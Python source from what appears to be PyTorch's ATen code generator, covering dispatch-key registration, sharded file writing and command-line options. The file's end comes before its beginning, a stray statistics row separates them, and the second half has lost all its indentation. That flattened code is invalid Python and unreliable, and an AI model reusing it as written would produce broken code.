    })

    cpu_fm.write('RegistrationDeclarations.h', lambda: {
        'registration_declarations': [compute_registration_declarations(f, backend_indices) for f in native_functions],
    })

    cpu_fm.write('FunctionalInverses.h', lambda: {
        'view_inverse_declarations': list(mapMaybe(gen_functionalization_view_inverse_declaration, native_functions))
    })

    # Builds the _(aten, name) / _(attr, name) X-macro lists for interned strings.
    def gen_aten_interned_strings() -> Dict[str, str]:
        attrs = set()  # All function argument names
        names = set()  # All ATen function names
        for func in native_functions:
            names.add(str(func.func.name.name))
            # Some operators don't have a functional variant but we still create a
            # symbol without the underscore
            names.add(func.func.name.name.base)
            for arg in func.func.schema_order_arguments():
                attrs.add(arg.name)

        # These are keywords in C++, so aren't valid symbol names
        # https://en.cppreference.com/w/cpp/language/operator_alternative
        names -= set(['and', 'and_eq', 'bitand', 'bitor', 'compl', 'not',
                      'not_eq', 'or', 'or_eq', 'xor', 'xor_eq'])

        return {
            'aten_symbols': ' \\\n'.join([
                f"_(aten, {name})" for name in sorted(names)
            ]),
            'attr_symbols': ' \\\n'.join([
                f"_(attr, {name})" for name in sorted(attrs)
            ]),
        }

    core_fm.write('aten_interned_strings.h', gen_aten_interned_strings)
def gen_source_files(
        *,
        native_functions: Sequence[NativeFunction],
        grouped_native_functions: Sequence[Union[NativeFunction, NativeFunctionsGroup]],
        static_dispatch_idx: Optional[BackendIndex],
        selector: SelectiveBuilder,
        backend_indices: Dict[DispatchKey, BackendIndex],
        core_fm: FileManager,
        cpu_fm: FileManager,
        cuda_fm: FileManager,
        dispatch_keys: Sequence[DispatchKey],
        functions_keys: Set[DispatchKey],
        rocm: bool,
        force_schema_registration: bool,
        per_operator_headers: bool,
) -> None:
    """Generate all ATen .cpp source files: per-dispatch-key registration
    files, BackendSelect, schema registrations, sharded Operators.cpp, and
    the functionalization pass registrations."""
    extra_cuda_headers = '''\
#include <c10/cuda/CUDAGuard.h>
#include <ATen/cuda/ATenCUDAGeneral.h>
#include <ATen/cuda/CUDADevice.h>
#include <ATen/cuda/CUDAContext.h>'''
    if rocm:
        # Under ROCm the CUDA headers are replaced by their HIP equivalents.
        extra_cuda_headers = '''\
#include <ATen/hip/impl/HIPGuardImplMasqueradingAsCUDA.h>
#include <ATen/hip/ATenHIPGeneral.h>
#include <ATen/hip/HIPDevice.h>
#include <ATen/hip/HIPContext.h>'''

    for dispatch_key in dispatch_keys:
        fm = cuda_fm if is_cuda_dispatch_key(dispatch_key) else cpu_fm

        if per_operator_headers:
            # NOTE: closes over `backend_index`/`dispatch_namespace`, which are
            # assigned below but before operator_headers() is invoked.
            def operator_headers() -> List[str]:
                headers = []
                for fn in native_functions:
                    is_registered = backend_index.has_kernel(fn) or (
                        fn.structured and dispatch_key in
                        (DispatchKey.Meta, DispatchKey.CompositeExplicitAutograd))
                    if not is_registered:
                        continue

                    headers.append(f"#include <ATen/ops/{fn.root_name}_native.h>")
                    if dispatch_key == DispatchKey.CompositeExplicitAutograd:
                        headers.append(f"#include <ATen/ops/{fn.root_name}.h>")

                    if dispatch_key in functions_keys:
                        headers.append(
                            f"#include <ATen/ops/{fn.root_name}_{dispatch_namespace}_dispatch.h>")

                return sorted(set(headers))
        else:
            def operator_headers() -> List[str]:
                headers = ["#include <ATen/NativeFunctions.h>"]
                if dispatch_key == DispatchKey.CompositeExplicitAutograd:
                    headers.append("#include <ATen/Functions.h>")
                if dispatch_key in functions_keys:
                    headers.append(f"#include <ATen/{dispatch_key!s}Functions.h>")
                return headers

        backend_index = backend_indices[dispatch_key]
        dispatch_namespace = str(dispatch_key).lower()
        fm.write_with_template(f'Register{dispatch_key}.cpp', 'RegisterDispatchKey.cpp', lambda: {
            'extra_cuda_headers': extra_cuda_headers if is_cuda_dispatch_key(dispatch_key) else '',
            'external_backend_headers': '',
            'dispatch_headers': dest.gen_registration_headers(backend_index, per_operator_headers, rocm),
            'ops_headers': operator_headers(),
            'DispatchKey': dispatch_key,
            'dispatch_namespace': dispatch_key.lower(),
            'dispatch_helpers': dest.gen_registration_helpers(backend_index),
            'dispatch_namespaced_definitions': list(concatMap(
                dest.RegisterDispatchKey(
                    backend_index,
                    Target.NAMESPACED_DEFINITION,
                    selector,
                    rocm=rocm,
                    cpp_namespace='at::native',
                    class_method_name=None),
                grouped_native_functions
            )),
            'dispatch_anonymous_definitions': list(concatMap(
                dest.RegisterDispatchKey(
                    backend_index,
                    Target.ANONYMOUS_DEFINITION,
                    selector,
                    rocm=rocm,
                    cpp_namespace='at::native',
                    class_method_name=None),
                grouped_native_functions
            )),
            'dispatch_registrations': list(concatMap(
                dest.RegisterDispatchKey(
                    backend_index,
                    Target.REGISTRATION,
                    selector,
                    rocm=rocm,
                    cpp_namespace='at::native',
                    class_method_name=None),
                grouped_native_functions
            )),
        })

    # BackendSelect is generated specially
    def gen_backend_select() -> Dict[str, List[str]]:
        relevant_fns = [fn for fn in native_functions if needs_backend_select(fn, selector)]
        return {
            'ops_headers': [f'#include <ATen/ops/{fn.root_name}_ops.h>' for fn in relevant_fns],
            'backend_select_method_definitions':
                list(mapMaybe(ComputeBackendSelect(Target.DEFINITION, selector), relevant_fns)),
            'backend_select_function_registrations':
                list(mapMaybe(ComputeBackendSelect(Target.REGISTRATION, selector), relevant_fns)),
        }
    cpu_fm.write('RegisterBackendSelect.cpp', gen_backend_select)

    # With force_schema_registration, schemas are registered for every op,
    # even those the selector filtered out.
    schema_selector = selector
    if force_schema_registration:
        schema_selector = SelectiveBuilder.get_nop_selector()
    cpu_fm.write('RegisterSchema.cpp', lambda: {
        'schema_registrations': list(mapMaybe(RegisterSchema(schema_selector), native_functions)),
    })

    # Sharding key: ops sharing a root name always land in the same shard.
    def key_func(fn: Union[NativeFunction, NativeFunctionsGroup]) -> str:
        return fn.root_name

    cpu_fm.write_sharded(
        'Operators.cpp',
        native_functions,
        key_fn=key_func,
        env_callable=lambda fn: {
            'operator_headers': [f'#include <ATen/ops/{fn.root_name}.h>'],
            'definitions': [ComputeOperators(Target.DEFINITION)(fn)]},
        num_shards=5,
        sharded_keys={'operator_headers', 'definitions'}
    )

    cpu_fm.write('Functions.cpp', lambda: {})

    core_fm.write('TensorMethods.cpp', lambda: {})

    core_fm.write('ATenOpList.cpp', lambda: {
        'aten_ops': list(mapMaybe(compute_aten_op, native_functions)),
    })

    # We need to easily map from [inplace_op_name] -> [functional_op] for the functionalization pass,
    # so here I generate a mapping from every operator name to its corresponding functional NativeFunction (if it exist).
    pre_grouped_d: Dict[FunctionSchema, Dict[SchemaKind, NativeFunction]] = pre_group_native_functions(native_functions)
    to_functional_op: Dict[OperatorName, Optional[NativeFunction]] = {
        k: v for d in [
            {f.func.name: pre_grouped_d[func][SchemaKind.functional]
             if SchemaKind.functional in pre_grouped_d[func].keys() else None
             for f in pre_grouped_d[func].values()}
            for func in pre_grouped_d.keys()]
        for k, v in d.items()
    }

    def functionalization_env_callable(
            g: Union[NativeFunction, NativeFunctionsGroup]
    ) -> Dict[str, List[str]]:
        functions = [g] if isinstance(g, NativeFunction) else list(g.functions())
        functions_needing_functionalization = [
            fn for fn in functions if needs_functionalization(selector, fn)]
        return {
            'ops_headers': ([
                f"#include <ATen/ops/{functions[0].root_name}_native.h>",
                f"#include <ATen/ops/{functions[0].root_name}_ops.h>",
            ] if functions_needing_functionalization else []),
            'func_definitions': list(mapMaybe(
                lambda f: gen_functionalization_definition(selector, f, to_functional_op[f.func.name]),
                functions_needing_functionalization)),
            'func_registrations': list(mapMaybe(
                lambda f: gen_functionalization_registration(
                    selector, f, backend_indices[DispatchKey.CompositeImplicitAutograd]),
                functions_needing_functionalization)),
        }

    cpu_fm.write_sharded(
        'RegisterFunctionalization.cpp',
        grouped_native_functions,
        key_fn=key_func,
        env_callable=functionalization_env_callable,
        num_shards=4,
        sharded_keys={'ops_headers', 'func_definitions', 'func_registrations'}
    )
def gen_declarations_yaml(
        cpu_fm: FileManager,
        native_functions: Sequence[NativeFunction]) -> None:
    """Write Declarations.yaml, the legacy description of every native function."""
    # Kept lazy: the list is only built if/when the FileManager invokes the callable.
    cpu_fm.write(
        'Declarations.yaml',
        lambda: format_yaml([compute_declaration_yaml(f) for f in native_functions]))
def main() -> None:
    """Command-line entry point for the ATen code generator.

    Parses CLI options, loads native_functions.yaml, and dispatches to
    gen_source_files / gen_headers / gen_declarations_yaml according to
    --generate.  If --output-dependencies is given, also writes one
    dependency-list file per FileManager for consumption by the build.
    """
    # --- Phase 1: command-line parsing -----------------------------------
    parser = argparse.ArgumentParser(description='Generate ATen source files')
    parser.add_argument(
        '-s',
        '--source-path',
        help='path to source directory for ATen',
        default='aten/src/ATen')
    parser.add_argument(
        '-o',
        '--output-dependencies',
        help='output a list of dependencies into the given file and exit')
    parser.add_argument(
        '--dry-run', action='store_true',
        help='run without writing any files (still updates outputs)')
    parser.add_argument(
        '--per-operator-headers', action='store_true',
        help='generate separate headers per operator in ATen/ops')
    parser.add_argument(
        '-d', '--install_dir', help='output directory',
        default='build/aten/src/ATen')
    parser.add_argument(
        '--rocm',
        action='store_true',
        help='reinterpret CUDA as ROCm/HIP and adjust filepaths accordingly')
    # TODO: --op_registration_whitelist will be removed when all call-sites
    # for gen.py are moved over to using the operator YAML file for mobile
    # custom build.
    parser.add_argument(
        '--op_registration_whitelist',
        nargs='*',
        help='filter op registrations by the whitelist (if set); '
        'each item is `namespace`::`operator name` without overload name; '
        'e.g.: aten::empty aten::conv2d ...')
    parser.add_argument(
        '--op_selection_yaml_path',
        help='Provide a path to the operator selection (for custom build) YAML '
        'that contains the information about the set of selected operators '
        'and their categories (training, ...). Each operator is either a '
        'full operator name with overload or just a bare operator name. '
        'The operator names also contain the namespace prefix (e.g. aten::)')
    parser.add_argument(
        '--backend_whitelist',
        nargs='*',
        help='filter dispatch backend by the whitelist (if set), '
        'e.g.: CPU CUDA QuantizedCPU ...')
    parser.add_argument(
        '--static_dispatch_backend',
        help='generate static dispatch code for the specific backend (if set)')
    parser.add_argument(
        '--force_schema_registration',
        action='store_true',
        help='force it to generate schema-only registrations for all ops, including'
        'those that are not listed on --op_registration_whitelist')
    parser.add_argument(
        '--generate',
        type=str,
        nargs='*',
        choices=['headers', 'sources', 'declarations_yaml'],
        default=['headers', 'sources', 'declarations_yaml'],
        help='Generate only a subset of files')
    options = parser.parse_args()
    # --- Phase 2: load the operator model --------------------------------
    # Build the selective-build filter (for mobile custom builds) from the
    # whitelist and/or the selection YAML; full build if neither is set.
    selector = get_custom_build_selector(
        options.op_registration_whitelist,
        options.op_selection_yaml_path,
    )
    native_yaml_path = os.path.join(options.source_path, 'native/native_functions.yaml')
    parsed_yaml = parse_native_yaml(native_yaml_path)
    native_functions, backend_indices = parsed_yaml.native_functions, parsed_yaml.backend_indices
    grouped_native_functions = get_grouped_native_functions(native_functions)
    template_dir = os.path.join(options.source_path, "templates")
    # --- Phase 3: output directories and file managers -------------------
    # NB: It is mandatory to NOT use os.path.join here, as the install directory
    # will eventually be ingested by cmake, which does not respect Windows style
    # path slashes. If you switch this to use os.path.join, you'll get an error
    # like:
    #
    #   Syntax error in cmake code when parsing string
    #
    #     C:/Jenkins/workspace/pytorch-builds/pytorch-win-ws2016-cuda9-cudnn7-py3-build/build/aten/src/ATen\core/TensorMethods.h
    #
    #   Invalid character escape '\c'.
    core_install_dir = f'{options.install_dir}/core'
    pathlib.Path(core_install_dir).mkdir(parents=True, exist_ok=True)
    ops_install_dir = f'{options.install_dir}/ops'
    pathlib.Path(ops_install_dir).mkdir(parents=True, exist_ok=True)
    def make_file_manager(install_dir: str) -> FileManager:
        # All managers share the template dir and honor --dry-run.
        return FileManager(install_dir=install_dir, template_dir=template_dir, dry_run=options.dry_run)
    core_fm = make_file_manager(core_install_dir)
    cpu_fm = make_file_manager(options.install_dir)
    cuda_fm = make_file_manager(options.install_dir)
    ops_fm = make_file_manager(ops_install_dir)
    # Extra #include lines injected into CUDA-specific generated files;
    # swapped for the HIP equivalents under --rocm.
    extra_cuda_headers = '''\
#include <c10/cuda/CUDAGuard.h>
#include <ATen/cuda/ATenCUDAGeneral.h>
#include <ATen/cuda/CUDADevice.h>
#include <ATen/cuda/CUDAContext.h>'''
    if options.rocm:
        extra_cuda_headers = '''\
#include <ATen/hip/impl/HIPGuardImplMasqueradingAsCUDA.h>
#include <ATen/hip/ATenHIPGeneral.h>
#include <ATen/hip/HIPDevice.h>
#include <ATen/hip/HIPContext.h>'''
    # --- Phase 4: dispatch-key configuration -----------------------------
    # The full set of dispatch keys we generate registrations for.
    dispatch_keys = [
        DispatchKey.CPU,
        DispatchKey.SparseCPU,
        DispatchKey.SparseCsrCPU,
        DispatchKey.MkldnnCPU,
        DispatchKey.CUDA,
        DispatchKey.SparseCUDA,
        DispatchKey.SparseCsrCUDA,
        DispatchKey.QuantizedCPU,
        DispatchKey.QuantizedCUDA,
        DispatchKey.CompositeImplicitAutograd,
        DispatchKey.CompositeExplicitAutograd,
        # Meta is a magic key: it is automatically generated for structured
        # kernels
        DispatchKey.Meta,
        DispatchKey.ZeroTensor,
    ]
    # Only a limited set of dispatch keys get CPUFunctions.h headers generated
    # for them; this is the set
    functions_keys = {
        DispatchKey.CPU,
        DispatchKey.CUDA,
        DispatchKey.CompositeImplicitAutograd,
        DispatchKey.CompositeExplicitAutograd,
        DispatchKey.Meta,
    }
    # Generic (backend-agnostic) keys always survive the whitelist filter.
    if options.backend_whitelist:
        dispatch_keys = [k for k in dispatch_keys if is_generic_dispatch_key(k) or str(k) in options.backend_whitelist]
    static_dispatch_idx: Optional[BackendIndex] = None
    if options.static_dispatch_backend:
        static_dispatch_idx = backend_indices[DispatchKey.parse(options.static_dispatch_backend)]
    # --- Phase 5: generation, gated by --generate ------------------------
    if 'sources' in options.generate:
        gen_source_files(
            native_functions=native_functions,
            grouped_native_functions=grouped_native_functions,
            static_dispatch_idx=static_dispatch_idx,
            selector=selector,
            backend_indices=backend_indices,
            core_fm=core_fm,
            cpu_fm=cpu_fm,
            cuda_fm=cuda_fm,
            dispatch_keys=dispatch_keys,
            functions_keys=functions_keys,
            rocm=options.rocm,
            force_schema_registration=options.force_schema_registration,
            per_operator_headers=options.per_operator_headers,
        )
    if 'headers' in options.generate:
        gen_headers(
            native_functions=native_functions,
            grouped_native_functions=grouped_native_functions,
            static_dispatch_idx=static_dispatch_idx,
            selector=selector,
            backend_indices=backend_indices,
            core_fm=core_fm,
            cpu_fm=cpu_fm,
            cuda_fm=cuda_fm,
            ops_fm=ops_fm,
            dispatch_keys=dispatch_keys,
            functions_keys=functions_keys,
            rocm=options.rocm,
            per_operator_headers=options.per_operator_headers,
        )
    if 'declarations_yaml' in options.generate:
        gen_declarations_yaml(
            native_functions=native_functions,
            cpu_fm=cpu_fm)
    # --- Phase 6: optional dependency-list output ------------------------
    # One depfile per FileManager; each gets a distinguishing prefix on both
    # the variable name and the output filename.
    if options.output_dependencies:
        depfile_path = pathlib.Path(options.output_dependencies).resolve()
        depfile_name = depfile_path.name
        depfile_stem = depfile_path.stem
        for fm, prefix in [
            (cpu_fm, ""),
            (core_fm, "core_"),
            (cuda_fm, "cuda_"),
            (ops_fm, "ops_"),
        ]:
            varname = prefix + depfile_stem
            path = depfile_path.parent / (prefix + depfile_name)
            fm.write_outputs(varname, str(path))
# Allow direct invocation of this module as a script.
if __name__ == '__main__':
    main()
| 43.305572 | 128 | 0.643291 | import os
from typing import List, Dict, Optional, Tuple, Set, Any, Union, Sequence, TypeVar
from typing_extensions import Literal
import yaml
from collections import OrderedDict, defaultdict, namedtuple
import argparse
import pathlib
import json
from dataclasses import dataclass
from tools.codegen.model import (Argument, DispatchKey, FunctionSchema,
Location, NativeFunction,
NativeFunctionsGroup, OperatorName,
BackendIndex, BackendMetadata,
OptionalType, SchemaKind, SelfArgument,
TensorOptionsArguments, Type, Variant,
is_cuda_dispatch_key,
is_generic_dispatch_key,
Tag, BaseOperatorName)
from tools.codegen.api.types import (Binding, CppSignature, CppSignatureGroup,
DispatcherSignature, NativeSignature)
from tools.codegen.api import cpp
import tools.codegen.api.dispatcher as dispatcher
import tools.codegen.api.native as native
import tools.codegen.api.meta as meta
import tools.codegen.api.structured as structured
from tools.codegen.api.translate import translate
from tools.codegen.selective_build.selector import SelectiveBuilder
from tools.codegen.utils import (
Target, concatMap, context, mapMaybe, YamlDumper, YamlLoader, FileManager, assert_never
)
from tools.codegen.context import (method_with_native_function,
native_function_manager,
with_native_function_and_indices,
with_native_function)
import tools.codegen.dest as dest
from tools.codegen.gen_functionalization_type import (
needs_functionalization,
gen_functionalization_definition,
gen_functionalization_registration,
gen_functionalization_view_inverse_declaration
)
T = TypeVar('T')
class LineLoader(YamlLoader):
def construct_mapping(self, node, deep=False):
mapping = super().construct_mapping(node, deep=deep)
mapping['__line__'] = node.start_mark.line + 1
return mapping
_GLOBAL_PARSE_NATIVE_YAML_CACHE = {}
ParsedYaml = namedtuple('ParsedYaml', ['native_functions', 'backend_indices'])
def parse_native_yaml(path: str) -> ParsedYaml:
global _GLOBAL_PARSE_NATIVE_YAML_CACHE
if path not in _GLOBAL_PARSE_NATIVE_YAML_CACHE:
with open(path, 'r') as f:
es = yaml.load(f, Loader=LineLoader)
assert isinstance(es, list)
rs: List[NativeFunction] = []
bs: Dict[DispatchKey, Dict[OperatorName, BackendMetadata]] = defaultdict(dict)
for e in es:
assert isinstance(e.get('__line__'), int), e
loc = Location(path, e['__line__'])
funcs = e.get('func')
with context(lambda: f'in {loc}:\n {funcs}'):
func, m = NativeFunction.from_yaml(e, loc)
rs.append(func)
BackendIndex.grow_index(bs, m)
error_check_native_functions(rs)
indices: Dict[DispatchKey, BackendIndex] = defaultdict(lambda: BackendIndex(
dispatch_key=DispatchKey.Undefined,
use_out_as_primary=True,
external=False,
device_guard=False,
index={}))
for k, v in bs.items():
indices[k] = BackendIndex(
dispatch_key=k,
use_out_as_primary=True,
external=False,
device_guard=is_cuda_dispatch_key(k),
index=v)
_GLOBAL_PARSE_NATIVE_YAML_CACHE[path] = ParsedYaml(rs, indices)
return _GLOBAL_PARSE_NATIVE_YAML_CACHE[path]
def error_check_native_functions(funcs: Sequence[NativeFunction]) -> None:
func_map: Dict[OperatorName, NativeFunction] = {}
base_func_map: Dict[BaseOperatorName, List[NativeFunction]] = defaultdict(list)
for f in funcs:
func_map[f.func.name] = f
base_func_map[f.func.name.name].append(f)
for f in funcs:
if f.structured_delegate is not None:
delegate_func = func_map[f.structured_delegate]
assert delegate_func.structured, \
f"{f.func.name} is marked as a structured_delegate pointing to " \
f"{f.structured_delegate}, but {f.structured_delegate} is not marked as structured. " \
f"Consider adding 'structured=True' to the delegated operator"
if f.tag is not None and f.tag is Tag.inplace_view:
base_name = f.func.name.name
overload_name = f.func.name.overload_name
assert base_name.inplace, \
f"{f.func.name} is marked with tag: inplace_view, but it doesn't follow the naming " \
"convention for inplace ops - the codegen expects the base name to have a trailing underscore. "
out_of_place_base_name = BaseOperatorName(base_name.base, False, base_name.dunder_method)
assert len(base_func_map[out_of_place_base_name]) > 0, \
f"{f.func.name} is marked with tag: inplace_view. The codegen expects there to be a corresponding " \
f"out-of-place view op with the name '{base_name}' and matching schema, but it didn't find one. "
def cpp_string(s: str) -> str:
s = s.replace('\\', '\\\\')
s = s.replace('"', '\\"')
s = s.replace('\a', '\\a')
s = s.replace('\b', '\\b')
s = s.replace('\f', '\\f')
s = s.replace('\n', '\\n')
s = s.replace('\v', '\\v')
s = s.replace('\t', '\\t')
return f'"{s}"'
def static_dispatch_keys(backend: Optional[BackendIndex]) -> List[DispatchKey]:
if backend is None:
return []
else:
return [
backend.dispatch_key,
DispatchKey.CompositeImplicitAutograd,
DispatchKey.CompositeExplicitAutograd
]
def get_static_dispatch_backend(f: NativeFunction, backend_index: BackendIndex) -> Optional[DispatchKey]:
if (f.structured_delegate is not None or backend_index.has_kernel(f)):
return backend_index.dispatch_key
elif f.has_composite_explicit_autograd_kernel:
return DispatchKey.CompositeExplicitAutograd
elif f.has_composite_implicit_autograd_kernel:
return DispatchKey.CompositeImplicitAutograd
return None
def static_dispatch_ops_header(
f: NativeFunction,
backend_index: Optional[BackendIndex]) -> Optional[str]:
if backend_index is None or f.manual_kernel_registration:
return None
dispatch_key = get_static_dispatch_backend(f, backend_index)
return (f'#include <ATen/ops/{f.root_name}_{dispatch_key.lower()}_dispatch.h>'
if dispatch_key is not None else None)
def static_dispatch_extra_headers(backend: Optional[BackendIndex], skip_tensor_include: bool = False) -> List[str]:
if skip_tensor_include:
maybe_inl = '_inl'
else:
maybe_inl = ''
return [f'#include <ATen/{dispatch_key}Functions{maybe_inl}.h>'
for dispatch_key in static_dispatch_keys(backend)]
def static_dispatch(
f: NativeFunction, cpp_sig: CppSignature,
*, method: bool, backend_index: Optional[BackendIndex]
) -> Optional[str]:
if backend_index is None or f.manual_kernel_registration:
return None
target_sig = CppSignatureGroup.from_native_function(f, method=False, fallback_binding=False).signature
name = target_sig.name()
exprs = translate(cpp_sig.arguments(), target_sig.arguments(), method=method)
exprs_str = ', '.join(a.expr for a in exprs)
dispatch_key = get_static_dispatch_backend(f, backend_index)
if dispatch_key is not None:
return f'return at::{dispatch_key.lower()}::{name}({exprs_str});'
return f'TORCH_CHECK(false, "Static dispatch does not support {name} for {backend_index.dispatch_key}.");'
@dataclass(frozen=True)
class RegisterSchema:
selector: SelectiveBuilder
@method_with_native_function
def __call__(self, f: NativeFunction) -> Optional[str]:
if not self.selector.is_native_function_selected(f):
return None
return f'm.def({cpp_string(str(f.func))});\n'
@dataclass(frozen=True)
class ComputeOperators:
target: Union[
Literal[Target.DECLARATION],
Literal[Target.DEFINITION]
]
@method_with_native_function
def __call__(self, f: NativeFunction) -> str:
sig = DispatcherSignature.from_schema(f.func)
name = f.func.name.unambiguous_name()
call_method_name = 'call'
redispatch_method_name = 'redispatch'
if self.target is Target.DECLARATION:
# Note [The ATen Operators API]
# The ATen Operators API lives in the at::_ops namespace, and contains compile-time
# metadata about each operator + entry points into the Dispatcher.
# The C++ function, method, and redispatch API's are all implemented as wrappers
# defined here, i.e. at::_ops::is_complex::call() and at::_ops::add_out::call().
# This means that ATEN_OP(is_complex) will not fastpath, and will go through the dispatcher.
return f"""
struct TORCH_API {name} {{
using schema = {sig.type()};
using ptr_schema = schema*;
// See Note [static constexpr char* members for windows NVCC]
STATIC_CONSTEXPR_STR_INL_EXCEPT_WIN_CUDA(name, "aten::{f.func.name.name}")
STATIC_CONSTEXPR_STR_INL_EXCEPT_WIN_CUDA(overload_name, "{f.func.name.overload_name}")
STATIC_CONSTEXPR_STR_INL_EXCEPT_WIN_CUDA(schema_str, {cpp_string(str(f.func))})
static {sig.defn(name=call_method_name, is_redispatching_fn=False)};
static {sig.defn(name=redispatch_method_name, is_redispatching_fn=True)};
}};"""
elif self.target is Target.DEFINITION:
defns = f"""
STATIC_CONST_STR_OUT_OF_LINE_FOR_WIN_CUDA({name}, name, "aten::{f.func.name.name}")
STATIC_CONST_STR_OUT_OF_LINE_FOR_WIN_CUDA({name}, overload_name, "{f.func.name.overload_name}")
STATIC_CONST_STR_OUT_OF_LINE_FOR_WIN_CUDA({name}, schema_str, {cpp_string(str(f.func))})
// aten::{f.func}
static C10_NOINLINE c10::TypedOperatorHandle<{name}::schema> create_{name}_typed_handle() {{
return c10::Dispatcher::singleton()
.findSchemaOrThrow({name}::name, {name}::overload_name)
.typed<{name}::schema>();
}}
"""
for is_redispatching_fn in [False, True]:
if is_redispatching_fn:
dispatcher_exprs_str = ', '.join(['dispatchKeySet'] + [a.name for a in sig.arguments()])
dispatcher_call = 'redispatch'
method_name = f'{name}::{redispatch_method_name}'
else:
dispatcher_exprs_str = ', '.join([a.name for a in sig.arguments()])
dispatcher_call = 'call'
method_name = f'{name}::{call_method_name}'
defns += f"""
// aten::{f.func}
{sig.defn(name=method_name, is_redispatching_fn=is_redispatching_fn)} {{
static auto op = create_{name}_typed_handle();
return op.{dispatcher_call}({dispatcher_exprs_str});
}}
"""
return defns
else:
assert_never(self.target)
# Generates Function.h, which provides the functional public C++ API,
# and the scaffolding to call into the dispatcher from these functions.
@dataclass(frozen=True)
class ComputeFunction:
static_dispatch_backend_index: Optional[BackendIndex]
@method_with_native_function
def __call__(self, f: NativeFunction) -> Optional[str]:
if Variant.function not in f.variants:
return None
sig_group = CppSignatureGroup.from_native_function(f, method=False, fallback_binding=f.manual_cpp_binding)
def generate_defn(faithful: bool) -> str:
if faithful:
sig = sig_group.faithful_signature
assert sig is not None
else:
sig = sig_group.signature
# See Note [The ATen Operators API]
target_sig = DispatcherSignature.from_schema(f.func)
exprs = translate(sig.arguments(), target_sig.arguments())
exprs_str = ', '.join([e.expr for e in exprs])
static_dispatch_block = static_dispatch(f, sig, method=False, backend_index=self.static_dispatch_backend_index)
if static_dispatch_block is None:
return f"""
// aten::{f.func}
TORCH_API inline {sig.decl()} {{
return at::_ops::{f.func.name.unambiguous_name()}::call({exprs_str});
}}
"""
else:
return f"""
// aten::{f.func}
TORCH_API inline {sig.decl()} {{
{static_dispatch_block}
}}
"""
result = generate_defn(False)
if sig_group.faithful_signature is not None:
result += generate_defn(True)
return result
# Generates TensorBody.h. This file provides the object-oriented (method-based)
# public C++ API, and the scaffolding to call into the dispatcher from these functions.
@dataclass(frozen=True)
class ComputeTensorMethod:
target: Union[
Literal[Target.DECLARATION],
Literal[Target.DEFINITION]
]
static_dispatch_backend_index: Optional[BackendIndex]
@method_with_native_function
def __call__(self, f: NativeFunction) -> Optional[str]:
if Variant.method not in f.variants:
return None
assert not f.func.is_out_fn()
assert f.func.arguments.self_arg is not None
sig_group = CppSignatureGroup.from_native_function(f, method=True, fallback_binding=f.manual_cpp_binding)
if self.target is Target.DECLARATION:
result = f"{sig_group.signature.decl()} const;\n"
if sig_group.faithful_signature is not None:
result += f"{sig_group.faithful_signature.decl()} const;\n"
return result
if self.target is not Target.DEFINITION:
assert_never(self.target)
def generate_defn(faithful: bool) -> str:
if faithful:
sig = sig_group.faithful_signature
assert sig is not None
else:
sig = sig_group.signature
target_sig = DispatcherSignature.from_schema(f.func)
exprs = translate(sig.arguments(), target_sig.arguments(), method=True)
exprs_str = ', '.join([e.expr for e in exprs])
static_dispatch_block = static_dispatch(f, sig, method=True, backend_index=self.static_dispatch_backend_index)
if static_dispatch_block is None:
return f"""
// aten::{f.func}
inline {sig.defn(prefix="Tensor::")} const {{
return at::_ops::{f.func.name.unambiguous_name()}::call({exprs_str});
}}
"""
else:
return f"""
// aten::{f.func}
inline {sig.defn(prefix="Tensor::")} const {{
{static_dispatch_block}
}}
"""
result = generate_defn(faithful=False)
if sig_group.faithful_signature is not None:
result += generate_defn(faithful=True)
return result
# Generates RedispatchFunctions.h.
# This is similar to the C++ API defined in Functions.h, but provides access
# to the dispatcher's redispatch API.
@dataclass(frozen=True)
class ComputeRedispatchFunction:
@method_with_native_function
def __call__(self, f: NativeFunction) -> Optional[str]:
sig_group = CppSignatureGroup.from_native_function(f, method=False, fallback_binding=f.manual_cpp_binding)
def generate_defn(faithful: bool) -> str:
if faithful:
sig = sig_group.faithful_signature
assert sig is not None
else:
sig = sig_group.signature
target_sig = DispatcherSignature.from_schema(f.func)
exprs = translate(sig.arguments(), target_sig.arguments())
exprs_str = ', '.join(['dispatchKeySet'] + [a.expr for a in exprs])
return f"""
// aten::{f.func}
TORCH_API inline {sig.decl(is_redispatching_fn=True)} {{
return at::_ops::{f.func.name.unambiguous_name()}::redispatch({exprs_str});
}}
"""
result = generate_defn(False)
if sig_group.faithful_signature is not None:
result += generate_defn(True)
return result
# one way or another, we should reevaluate if this is actually needed.
@with_native_function
def compute_aten_op(f: NativeFunction) -> str:
return f'{{"aten::{f.func.name.name}", "{f.func.name.overload_name}"}},'
# Generates MetaFunctions.h
def compute_meta_function_declaration(g: NativeFunctionsGroup) -> Optional[str]:
if not g.structured:
return None
with native_function_manager(g.out):
name = meta.name(g)
args = structured.meta_arguments(g)
args_str = ', '.join(a.decl() for a in args)
parent_class = g.out.structured_inherits
if parent_class is None:
parent_class = "at::impl::MetaBase"
meta_return = "void"
precomputed = g.out.precomputed if g.structured else None
if precomputed:
# Generate the template declaration with one bool parameter for each
# precomputed element. Each parameter is true if the corresponding (in
# terms of position) precomputed element has been set.
precomputed_values = [*precomputed.replace.values(), precomputed.add]
precomputed_elements = [elem for replace_list in precomputed_values for elem in replace_list]
precomputed_template_parameters = [elem.name.upper() for elem in precomputed_elements]
precomputed_template_params_str = ", ".join(f"bool {param} = false" for param in precomputed_template_parameters)
precompute_template_decl = f"template <{precomputed_template_params_str}>"
# Generate a string containing declarations of all precomputed elements.
precomputed_elements_with_cpp_types = [
structured.argument_type(elem, binds=elem.name)
for elem in precomputed_elements
]
precomputed_elements_decl = ";\n".join(
f"{elem.cpp_type(strip_ref=True)} {elem.name}" for elem in precomputed_elements_with_cpp_types
)
# Generate "setter" methods for each precomputed element. Each method will return
# a new instance of precompute_out with the template parameter that corresponds to
# the member set by the method to true (to indicate that it has been set).
setter_methods = []
for i, elem in enumerate(precomputed_elements):
# Generate the signature. The return type will be the same
# as the type of `this` but with the template parameter
# corresponding to the element set by this method set to true.
# The assert generated below will ensure that this template
# parameter is false on the type of `this`.
return_ty_templates = ", ".join(
precomputed_template_parameters[:i] + ["true"] + precomputed_template_parameters[i + 1:]
)
return_ty = f"precompute_out<{return_ty_templates}>"
elem_cpp_ty = precomputed_elements_with_cpp_types[i].cpp_type(strip_ref=True)
signature = f"{return_ty} set_{elem.name}({elem_cpp_ty} value)"
# Generate an assert which checks that the
# template parameter corresponding to the precomputed
# element that is set by this method is false on the
# class corresponding to the object that `this` points to.
# This ensures that each element can be set only once.
assert_msg = f"\"{precomputed_elements[i].name} already set\""
